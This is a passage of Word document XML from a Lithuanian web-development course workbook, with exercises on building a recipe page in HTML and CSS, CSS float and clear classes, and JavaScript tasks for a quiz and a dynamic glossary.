        <w:ind w:left="720" w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00FD0E6C" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="720" w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidR="00F62196" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000262D2" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
        <w:t>HTML (index.html)</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DOCTYPE htm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tml lang="e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eta charset="UTF-8"&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title&gt;Recipes&lt;/tit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eader class="container"&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1&gt;Recipes&lt;/h1&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Lorem ipsum dolor sit amet, consectetur adipisicing elit. &lt;/h3&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sandwiche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cupcake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hot drink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eader&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ain&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rtic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 class="container description"&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Description&lt;/h3&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This peanut butter and jelly sandwich is my favorite sandwich. It has the perfect balance of ingredients and looks great when made right.&lt;/p&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 class="container"&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img src="https://image.flaticon.com/icons/png/512/63/63035.png" alt="sandwich" width="200" height="200"&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Ingredients&lt;/h3&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2 slices of white bread&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1 jar of grape jelly&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1 jar of creamy peanut butter&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butter knif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sharp knif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cutting board&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lastRenderedPageBreak/>
        <w:t xml:space="preserve">                &lt;section class="container description"&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Directions&lt;/h3&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ay both slices of bread next to each other on a cutting board.&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ith the butter knife, spread a 1/8 inch layer of peanut butter on the left side&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On the right side, spread a 1/8 inch layer of jelly.&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Carefully place the two halves together so that the jelly is on top.&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ith the sharp knife, carefully cut the sandwich in half.&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Enjoy the PB&amp;amp;J!&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rtic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ain&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footer class="container"&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sandwiche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cupcake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hot drinks&lt;/a&gt;&lt;/li&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5&gt;Copyright &amp;copy; 2008 — 2018 WEBMASTER. &lt;/h5&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footer&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lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="001F1F10" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:left="720" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidR="000262D2" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
        <w:t>CSS (style.cs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Numatytųjų naršyklės stiliaus taisyklių perrašymas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sos išorinės paraštės (margin) lygios 0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margin:0;</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Šrifto tipo ir dydžio taisyklės visam tinklapiui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body{</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font-family: 'Questrial', sans-serif;</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font-size: 12p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Kelios klasės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description{</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background-color: #F3F3F3;</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container{</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padding: 30px</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>10px;</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Tinklapio antraštė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header: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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    fono spalva: #16A085,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lt;h1&gt;, esantis &lt;header&gt; dalyje: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as: visos didžiosios raidė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dinės paraštės (padding): 20px 0,</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h3&gt;, esantis &lt;header&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arpai tarp raidžių: 0,3 em</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nav&gt;, esantis &lt;header&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ršutinis rėmelis: 2px dashed whit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ršutinė vidinė paraštė: 20px;</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nuoroda, esanti &lt;header&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spalva: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pabraukimo nėr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sąrašas, esantis &lt;header&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sąrašo ženklinimo nėr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sos vidinės paraštės lygios 0;</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sąrašas išdėstytas eilutė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header nav li{</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display: inline-block;</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width: 150px;</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Pseudo klases nuorodoms, &lt;header&gt; dalyje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ink</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spalva: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visited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spalva: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hover</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spalva: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sktas pabraukta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activ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lastRenderedPageBreak/>
        <w:t>    teksto spalva: pilk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w:t>
      </w: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xml:space="preserve">    Tinklapio pagrindinė dalis | Main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h3&gt;, esantis &lt;artic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as: visos didžiosios raidė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spalva: #16A085;</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arpai tarp raidžių: 0,3em;</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ul&gt;, esančio &lt;artic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ženklinto sąrašo stilius: kvadrata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ol&gt;, esančio &lt;article&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numeracijos stilius: mažosios romėniškos raidė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eilutės aukštis: 2;</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pirmoji &lt;section&gt;, esanti &lt;main&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lygiavimas: centruotas (center);</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paveikla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rėmelis: 1px solid #16A085;</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inklapio baigiamoji dalis | footer</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footer&gt; daly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lygiavimas: centruotas;</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fono spalva: #16A085;</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nuorodos, esančio &lt;footer&g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pabraukimo nėr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teksto spalva: balta;</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lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t> </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lt;h5&gt;, esančio &lt;footer&gt; dalyje:</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    viršutinės vidinė paraštė: 20px;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Reikalavimai: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="0085044F" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      1.</w:t>
      </w:r>
      <w:r w:rsidR="00A35914" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000262D2" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
        <w:t>HTML dokumente, HEAD dalyje, įterpti nuorodą į CSS failą.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="0085044F" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="007E64EA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000262D2" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
        <w:t>CSS faile aprašyti stiliaus taisykles pagal reikalavimus.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:keepNext w:val="0"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">3 užduotis. </w:t>
      </w:r>
      <w:r w:rsidR="0036143A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>UŽRAŠYKITE</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> CSS KLASES (PARAMETRAI „FLOAT“ IR „CLEAR“)</w:t>
      </w:r>
      <w:r w:rsidR="008A4AC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
        <w:t>UŽDUOTIES SĄLYGA: įterpti į HTML dokumentą jau aprašytų klasių atributus. Duoti HTML (index.html) ir CSS (style.css) failai.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Reikalavimai: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="008A1E8F" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidR="000262D2" w:rsidRPr="00AD4464">
        <w:t>HTML dokumente, HEAD dalyje, įterpti nuorodą į CSS failą.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="008A1E8F" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidR="000262D2" w:rsidRPr="00AD4464">
        <w:t>HTML dokumente įterpti atitinkamų klasių atributus.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00313E45" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:before="480" w:after="160"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc13095505"/>
      <w:bookmarkStart w:id="26" w:name="_Toc13833400"/>
      <w:bookmarkStart w:id="27" w:name="_Toc14392419"/>
      <w:bookmarkStart w:id="28" w:name="_Toc10443956"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="000262D2" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Mokymosi rezultatas. Programuoti vartotojo užduočių vykdymą naudojant JavaScript kalbą</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
      <w:r w:rsidR="000262D2" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
      <w:bookmarkEnd w:id="27"/>
      <w:r w:rsidR="000262D2" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:keepNext w:val="0"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">1 užduotis. </w:t>
      </w:r>
      <w:r w:rsidR="00C67297">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>SUKURKITE</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> TESTĄ, TIKRINANTĮ IR PATEIKIANTĮ TEISINGUS ATSAKYMUS</w:t>
      </w:r>
      <w:r w:rsidR="008A4AC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>UŽDUOTIES SĄLYGA: sukurti testą, įgyvendinti testo sprendimą ir rezultatų pateikimą.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Reikalavimai:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="006725AF" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="120"/>
        <w:ind w:left="397" w:right="284"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidR="000262D2" w:rsidRPr="00AD4464">
        <w:t>Naudoti objekto duomenų tipą testo klausimams, atsakymų variantams ir teisingam atsakymui aprašyti.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="006725AF" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="120"/>
        <w:ind w:left="397" w:right="284"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidR="000262D2" w:rsidRPr="00AD4464">
        <w:t>Aprašyti funkcij</w:t>
      </w:r>
      <w:r w:rsidR="00014FB2" w:rsidRPr="00AD4464">
        <w:t>ą, įkeliančią</w:t>
      </w:r>
      <w:r w:rsidR="000262D2" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> klausimus į HTML dokumentą iš objekto.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="006725AF" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="120"/>
        <w:ind w:left="397" w:right="284"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidR="000262D2" w:rsidRPr="00AD4464">
        <w:t>Aprašyti funkciją, skaičiuojančią testo rezultatus.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Pavyzdys:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00C35D02" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:right="282"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D5A4C21" wp14:editId="3C277192">
            <wp:extent cx="4465955" cy="3140710"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17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65955" cy="3140710"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:keepNext w:val="0"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">2 užduotis. </w:t>
      </w:r>
      <w:r w:rsidR="00ED73F6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>SUKURKITE</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> DINAMIŠKĄ SĄVOKŲ SĄRAŠĄ</w:t>
      </w:r>
      <w:r w:rsidR="008A4AC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>UŽDUOTIES SĄLYGA: sukurti dinamišką sąvokų sąrašą pagal pateiktą pavyzdį.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">DUOTA: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="006C2EC6" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidR="00914982" w:rsidRPr="00AD4464">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00F27378" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="000262D2" w:rsidRPr="00AD4464">
        <w:t>index.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>&lt;!DOCTYPE html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>&lt;html lang="en"&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head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>&lt;meta charset="UTF-8"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>&lt;meta name="viewport" content="width=device-width, initial-scale=1.0"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>&lt;meta http-equiv="X-UA-Compatible" content="ie=edge"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>&lt;title&gt;WEB technologies&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
